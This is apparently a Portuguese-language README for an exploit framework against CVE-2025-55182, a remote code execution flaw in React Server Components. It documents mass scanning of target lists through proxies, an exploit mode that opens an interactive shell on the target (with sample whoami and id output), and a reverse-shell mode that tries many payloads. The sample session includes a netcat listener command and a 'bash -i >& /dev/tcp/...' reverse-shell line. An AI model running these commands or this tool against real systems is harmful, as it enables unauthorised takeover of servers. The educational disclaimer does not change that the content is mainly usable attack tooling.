
Scanner de vulnerabilidades críticas de RCE para React Server Components (CVE-2025-55182). Framework de exploração automatizado com suporte a múltiplos payloads, recursos de proxy e execução interativa de comandos.
[!Warning] Este repositório destina-se apenas a fins educacionais e de pesquisa.
- Use os PoCs fornecidos exclusivamente em sistemas que você possui ou para os quais tem permissão explícita para testar.
- Acesso não autorizado, exploração ou uso indevido de qualquer material neste repositório é ilegal.
- O(s) autor(es) não assumem nenhuma responsabilidade por quaisquer danos, uso indevido ou consequências legais decorrentes do uso inadequado.
CVE-2025-55182 é uma vulnerabilidade crítica de execução remota de código que afeta as versões 19.0.0, 19.1.0, 19.1.1 e 19.2.0 do React Server Components. Esta vulnerabilidade decorre da desserialização insegura de cargas úteis de requisições HTTP para endpoints de Funções de Servidor, permitindo que atacantes não autenticados executem código arbitrário remotamente.
ID CVE: CVE-2025-55182
Versões Afetadas:
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]
| Argumento | Descrição |
|---|---|
-d, --detection | Executa no modo de detecção (varre por vulnerabilidades) |
-e, --exploit | Executa no modo de exploração (explora um único alvo) |
-u, --url URL | URL do alvo único para varrer/explorar |
-l, --list FILE | Arquivo contendo lista de URLs alvo (apenas modo detecção) |
-p, --proxy URL | URL de proxy único (ex.: http://127.0.0.1:8080) |
-pl, --proxy-list FILE | Arquivo contendo lista de URLs de proxy (um por linha) |
-t, --threads N | Número de threads simultâneas (padrão: 10, apenas modo detecção) |
-s, --silent | Modo silencioso - mostra apenas alvos vulneráveis (apenas modo detecção) |
-o, --output [FILE] | Salva alvos vulneráveis em arquivo (apenas modo detecção). Se nenhum nome de arquivo for fornecido, usa o padrão: CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt |
--debug | Ativa log de depuração - mostra detalhes da resposta e tentativas de repetição (não disponível no modo silencioso) |
python3 main.py -d -u https://example.com
python3 main.py -d -l targets.txt
python3 main.py -d -l targets.txt -p http://127.0.0.1:8080
python3 main.py -d -l targets.txt -s
python3 main.py -d -l targets.txt -t 20
python3 main.py -e -u https://vulnerable-site.com
Em seguida, selecione [i] para shell interativo:
Choose exploitation method:
[i] Interactive shell
[r] Reverse shell
Enter your choice (i/r): i
shell> whoami
ec2-user
shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)
shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
...
shell> exit
python3 main.py -e -u https://vulnerable-site.com
Em seguida, selecione [r] para reverse shell e escolha o tipo de payload:
Choose exploitation method:
[i] Interactive shell
[r] Reverse shell
Enter your choice (i/r): r
Choose payload option:
[d] Use default payloads (Try multiple reverse shells)
[c] Provide custom payload
Enter your choice (d/c): d
Enter your IP and port in this format:
Example: 192.168.1.100:4444
IP:PORT> 192.168.1.100:4444
Setup your listener with this command:
nc -lvnp 4444
Press ENTER when your listener is ready...
A ferramenta tentará automaticamente mais de 17 payloads de reverse shell diferentes até que um tenha sucesso.
Enter your choice (d/c): c
Enter your custom reverse shell payload:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1